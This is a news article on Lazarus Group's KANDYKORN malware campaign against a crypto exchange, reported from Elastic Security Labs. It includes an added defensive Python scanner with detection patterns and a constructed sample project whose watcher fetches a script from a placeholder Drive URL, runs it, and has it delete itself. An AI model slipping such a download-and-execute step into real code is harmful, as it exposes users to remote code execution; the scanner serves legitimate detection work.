Lazarus Group Exploits New Malware 'KANDYKORN' to Target Crypto Exchanges
Summary:
The North Korean cybercrime syndicate, Lazarus Group, recently deployed a new variety of malware, "KANDYKORN", to breach a crypto exchange, according to Elastic Security Labs. The security firm discovered KANDYKORN after Lazarus Group members posed as blockchain engineers and tricked the exchange's engineers into downloading a supposedly profitable arbitrage bot. The bot, however, was a malicious program that established a connection to an unknown Google Drive account and downloaded additional malicious content. This content included "SUGARLOADER", a loader that evaded most malware detection systems. Once installed, it loaded KANDYKORN directly into the device's memory, ready to perform a range of harmful operations. Elastic believes the still-active threat began in April 2023.
The infamous Lazarus Group has reportedly used a new malware variant in an attempt to breach a crypto exchange, as outlined in an analysis published by Elastic Security Labs on October 31. Elastic has labeled the new malware “KANDYKORN,” and the loader that stages it in memory “SUGARLOADER,” after its unusual ".sld" file extension. Elastic has not disclosed which crypto exchange was targeted.
In 2023, crypto platforms have been besieged with numerous private-key breaches, predominantly traced back to the notorious North Korean cybercrime syndicate, Lazarus Group.
As for the assault in question, Elastic reports that the Lazarus Group initiated the attack by masquerading as blockchain professionals, luring engineers of the anonymous crypto platform. Establishing contact via Discord, the attackers fraudulently claimed they had created a successful arbitrage bot capable of cashing in on price variations between different crypto exchanges. They persuaded the engineers to download this so-called "bot." Deceptively named files, such as “config.py” and “pricetable.py,” were tucked away in the program's zip folder, lending it the appearance of a genuine arbitrage bot.
The trap was sprung when the engineers launched the program: a “Main.py” file carried out a set of innocuous operations while also running a malicious file named “Watcher.py.” This file connected to an external Google Drive account and pulled content from it into another file named testSpeed.py, which was run once and then deleted to remove evidence.
During that single run of testSpeed.py, the program fetched further content and eventually launched a file Elastic refers to as “SUGARLOADER.” The file was concealed with a "binary packer," leaving it largely invisible to most antivirus software. Elastic nonetheless uncovered it by suspending the program after initialization and taking a snapshot of the process's virtual memory. When submitted to VirusTotal for malware detection, SUGARLOADER came up clean.
Once on the system, SUGARLOADER connected to a remote server and downloaded KANDYKORN straight into the device's memory. KANDYKORN offers an array of functions that the remote server can invoke to carry out a variety of harmful operations. For example, the command “0xD3” lets the attacker list a directory's contents on the targeted machine, while “resp_file_down” transfers files from the victim's system to the attacker's.
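The infection chain described above (a benign-looking Python project, a watcher that fetches a script from a Google Drive URL, writes it to disk, runs it, and a stage that deletes its own source file) has a static footprint that defenders can look for before the packed loader ever runs. The following script is an added example, not code from Elastic's report or from the article, and it does not use the real samples: it scans the files of a Python project for those behaviours and escalates when a remote-fetch indicator and a dynamic-execution indicator appear together. The sample project, the placeholder Drive URL and the rule set are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Each rule: name, regex over a source line, short reason. These are generic
# indicators of download-and-execute and self-cleanup behaviour, constructed
# for this example; they are not signatures for any real sample.
RULES = [
    ("remote_fetch",
     re.compile(r"\b(urllib\.request\.urlopen|requests\.get|urlopen)\s*\("),
     "fetches content from a remote URL"),
    ("drive_host",
     re.compile(r"drive\.google\.com|googleapis\.com"),
     "contacts a Google Drive endpoint"),
    ("dynamic_exec",
     re.compile(r"\b(exec|eval)\s*\(|subprocess\.(run|Popen|call)\s*\("),
     "executes fetched code or spawns a process"),
    ("self_delete",
     re.compile(r"os\.(remove|unlink)\s*\(\s*__file__\s*\)"),
     "deletes its own source file after running"),
    ("write_then_run",
     re.compile(r"open\([^)]*\.py['\"]?,\s*['\"]w"),
     "writes a new .py file (possible staged second stage)"),
]


@dataclass
class Finding:
    path: str
    rule: str
    line_no: int
    reason: str


def scan_source(path, text):
    """Apply every rule to every non-comment part of every line of one file."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.split("#", 1)[0]  # ignore trailing comments
        for name, pattern, reason in RULES:
            if pattern.search(stripped):
                findings.append(Finding(path, name, line_no, reason))
    return findings


def scan_project(files):
    """files: dict of path -> source text. Returns (findings, high_risk)."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_source(path, text))
    rules_hit = {f.rule for f in findings}
    # A remote fetch combined with execution in the same project is the
    # download-and-execute chain worth escalating; either alone is only noise.
    fetch = "remote_fetch" in rules_hit or "drive_host" in rules_hit
    high_risk = fetch and "dynamic_exec" in rules_hit
    return findings, high_risk


# Constructed sample "arbitrage bot": two benign modules plus a watcher that
# downloads a staged script, writes it to disk and runs it; the staged script
# removes itself after running. The Drive URL is a placeholder, not a real ID.
SAMPLE_PROJECT = {
    "config.py": "EXCHANGES = ['a', 'b']\nTHRESHOLD = 0.002\n",
    "pricetable.py": "def spread(p1, p2):\n    return abs(p1 - p2) / p1\n",
    "watcher.py": (
        "import urllib.request, subprocess\n"
        "URL = 'https://drive.google.com/uc?id=PLACEHOLDER_ID'\n"
        "data = urllib.request.urlopen(URL).read()\n"
        "with open('testSpeed.py', 'w') as f:\n"
        "    f.write(data.decode())\n"
        "subprocess.run(['python3', 'testSpeed.py'])\n"
    ),
    "testSpeed.py": "import os\nprint('ok')\nos.remove(__file__)\n",
}

if __name__ == "__main__":
    results, risky = scan_project(SAMPLE_PROJECT)
    for f in results:
        print(f"{f.path}:{f.line_no} [{f.rule}] {f.reason}")
    print("verdict:", "HIGH RISK" if risky else "no download-and-execute chain found")
```

Run on the constructed project, the scanner reports five findings (the Drive host, the fetch, the staged write and the spawn in watcher.py, and the self-deletion in testSpeed.py) and a high-risk verdict, while the two benign modules alone produce nothing. In practice such a triage pass belongs in the review step before any externally supplied code is run on an engineer's workstation; it complements, rather than replaces, the memory-snapshot approach Elastic used for the packed loader.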
Elastic estimates that the assault occurred in April of 2023, and strongly suspects ongoing malicious activity with the following statement, “This threat is still active and the tools and techniques are being continuously developed.”
Over the course of 2023, a wave of attacks has struck centralized crypto exchanges and apps. Victims range from Alphapo, CoinsPaid, Atomic Wallet, and Coinex to Stake, among others. Most of these attacks appear to have centered on extracting a private key from the victim’s device, which was then used to redirect client cryptocurrency to an attacker-controlled address. The US Federal Bureau of Investigation (FBI) has directly implicated the Lazarus Group in the Coinex and Stake heists, among others.
Published At
11/1/2023 9:00:00 PM
Disclaimer: Algoine does not endorse any content or product on this page. Readers should conduct their own research before taking any actions related to the asset, company, or any information in this article and assume full responsibility for their decisions. This article should not be considered as investment advice. Our news is prepared with AI support.